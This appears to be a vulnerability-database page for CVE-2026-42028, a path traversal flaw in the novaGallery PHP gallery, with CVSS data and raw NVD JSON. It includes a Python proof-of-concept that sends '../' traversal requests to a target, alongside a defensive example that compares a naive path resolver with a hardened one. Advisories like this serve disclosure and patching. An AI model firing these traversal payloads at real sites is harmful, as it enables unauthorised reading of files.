Security Vulnerability Report
CVE-2026-42028 CVSS 5.3 MEDIUM

CVE-2026-42028

Published: 2026-05-08 17:16:31
Last Modified: 2026-05-08 18:16:34

Description

novaGallery is a PHP image gallery. Prior to version 2.1.1, a path traversal vulnerability (CWE-22) has been identified in novaGallery. This allows unauthenticated users to read image files outside the intended gallery root directory. This issue has been patched in version 2.1.1.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No NVD CPE configuration data has been attached yet (vulnStatus: Received). Affected range as stated in the advisory text:

novaGallery < 2.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests


def exploit(target_url):
    # The advisory does not name the vulnerable parameter; 'file' and the
    # index.php entry point are assumptions, so adjust them to the target.
    # The payload walks out of the gallery root; the file name is illustrative.
    traversal_payload = "../../../tmp/sensitive_image.jpg"
    # Example: http://target.com/novagallery/index.php?file=../../../tmp/sensitive_image.jpg
    attack_url = f"{target_url}/index.php?file={traversal_payload}"
    try:
        response = requests.get(attack_url, timeout=5)
    except requests.RequestException as e:
        print(f"[-] Error occurred: {e}")
        return False

    if response.status_code != 200:
        print(f"[-] Exploit failed. HTTP Status Code: {response.status_code}")
        return False

    print("[+] Request sent successfully.")
    print("[+] Checking if file content was leaked...")
    # Look for JPEG (JFIF) or PNG magic in the body to confirm an image was served
    if b"JFIF" in response.content or b"PNG" in response.content:
        print("[!] Vulnerability Confirmed: Image file read successfully.")
        print(f"[+] Content Length: {len(response.content)} bytes")
        return True
    print("[-] Response received, but content does not look like an image.")
    return False


if __name__ == "__main__":
    target = "http://127.0.0.1/novagallery"  # Replace with actual target
    exploit(target)
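The description above is the classic CWE-22 shape: a user-supplied file name is joined onto the gallery directory and opened without checking that the resolved path still lies inside that directory. The following is an added example and is not novaGallery's code or its 2.1.1 fix (the real patch lives in the referenced commit and is not reproduced here). It places a naive resolver beside a hardened one that canonicalises the candidate with realpath, requires containment in the resolved gallery root, and restricts the extension to image types, then runs both over plain, percent-encoded, absolute and symlink traversal inputs. The directory layout, file names, the ALLOWED_EXT list and the demo() harness are all constructed for illustration.

```python
import os
import shutil
import tempfile
from urllib.parse import unquote

# Constructed allow-list of image extensions for the hardened resolver.
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif", ".webp"}


class TraversalError(ValueError):
    """Raised when a requested path would leave the gallery root."""


def resolve_vulnerable(gallery_root: str, requested: str) -> str:
    """The CWE-22 pattern: join user input onto the root and open the result.
    '../' segments, absolute paths and symlinks all walk out of the root."""
    return os.path.normpath(os.path.join(gallery_root, unquote(requested)))


def resolve_hardened(gallery_root: str, requested: str) -> str:
    """Canonicalise the candidate and require containment in the real root."""
    root = os.path.realpath(gallery_root)
    decoded = unquote(requested)  # decode once, then judge the decoded value
    if "\x00" in decoded:
        raise TraversalError("NUL byte in path")
    if os.path.isabs(decoded):
        raise TraversalError("absolute path rejected")
    # realpath collapses '..' and follows symlinks, so a link inside the
    # gallery that points outside it is resolved to its real location.
    candidate = os.path.realpath(os.path.join(root, decoded))
    if os.path.commonpath([root, candidate]) != root:
        raise TraversalError(f"{requested!r} escapes the gallery root")
    if os.path.splitext(candidate)[1].lower() not in ALLOWED_EXT:
        raise TraversalError("not an image file")
    if not os.path.isfile(candidate):
        raise FileNotFoundError(candidate)
    return candidate


def demo() -> dict:
    """Build a constructed tree and run both resolvers over traversal inputs."""
    base = tempfile.mkdtemp()
    try:
        gallery = os.path.join(base, "gallery")
        secret = os.path.join(base, "secret")  # sits outside the gallery root
        os.makedirs(os.path.join(gallery, "album"))
        os.makedirs(secret)
        for path in (os.path.join(gallery, "album", "cat.jpg"),
                     os.path.join(secret, "private.jpg")):
            with open(path, "wb") as fh:
                fh.write(b"\xff\xd8\xff\xe0\x00\x10JFIF")  # constructed JPEG header
        cases = {
            "legit": "album/cat.jpg",
            "dotdot": "../secret/private.jpg",
            "encoded": "..%2Fsecret%2Fprivate.jpg",
            "absolute": os.path.join(secret, "private.jpg"),
        }
        try:  # symlink escape; skipped where symlinks cannot be created
            os.symlink(secret, os.path.join(gallery, "link"))
            cases["symlink"] = "link/private.jpg"
        except OSError:
            pass

        results = {}
        for label, req in cases.items():
            naive = resolve_vulnerable(gallery, req)
            try:
                hardened = resolve_hardened(gallery, req)
            except (TraversalError, FileNotFoundError) as exc:
                hardened = f"REJECTED: {exc}"
            results[label] = {
                "naive_opens": os.path.isfile(naive),  # would the naive code serve it?
                "hardened": hardened,
            }
        return results
    finally:
        shutil.rmtree(base, ignore_errors=True)


if __name__ == "__main__":
    for label, outcome in demo().items():
        print(f"{label:9} naive_opens={outcome['naive_opens']!s:5} "
              f"hardened={outcome['hardened']}")
```

Two details matter in practice. A string-prefix check on the unresolved path would accept the symlink case, because "gallery/link/private.jpg" textually starts with the gallery root; comparing realpath results is what catches it. And percent-decoding must happen exactly once before the check, otherwise "..%2F" slips past a filter that only looks for a literal "../".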

References

https://github.com/novafacile/novagallery/security/advisories/GHSA-wv5j-98c7-frm9
https://github.com/novafacile/novagallery/commit/46fe7b0f79f429e18c8cff3f92360c4513732ba6
https://github.com/novafacile/novagallery/releases/tag/v2.1.1

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42028", "sourceIdentifier": "[email protected]", "published": "2026-05-08T17:16:31.177", "lastModified": "2026-05-08T18:16:33.827", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "novaGallery is a php image gallery. Prior to version 2.1.1, a path traversal vulnerability has been identified in novaGallery. This allows unauthenticated users to read image files outside the intended gallery root directory. This issue has been patched in version 2.1.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/novafacile/novagallery/commit/46fe7b0f79f429e18c8cff3f92360c4513732ba6", "source": "[email protected]"}, {"url": "https://github.com/novafacile/novagallery/releases/tag/v2.1.1", "source": "[email protected]"}, {"url": "https://github.com/novafacile/novagallery/security/advisories/GHSA-wv5j-98c7-frm9", "source": "[email protected]"}, {"url": "https://github.com/novafacile/novagallery/security/advisories/GHSA-wv5j-98c7-frm9", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}